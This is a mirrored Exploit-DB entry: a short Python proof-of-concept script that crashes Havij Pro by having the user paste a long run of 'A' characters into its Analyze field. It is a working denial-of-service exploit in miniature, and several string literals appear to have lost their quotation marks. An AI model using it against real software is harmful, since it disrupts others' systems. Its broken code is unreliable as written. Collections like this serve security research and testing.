exploit-db-mirror/exploits/windows/dos/37747.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
391 B
Python
Executable file

#!/usr/bin/env python
#Exploit Title:Havij Pro Crash POC
# Tested:windows7
#Sofrware Link:http://www.itsecteam.com/
#Version:1.17
#Email:i_7e1@outlook.com
#Author:M1x7e1@Safeye Team
#run python poc.py
#copy content to target
#click Analyze
## EDB-Note: tested and verified using version 1.6 Pro
content = \x41 * 8000
file = open(xx.txt,w)
file.write(content)
file.close()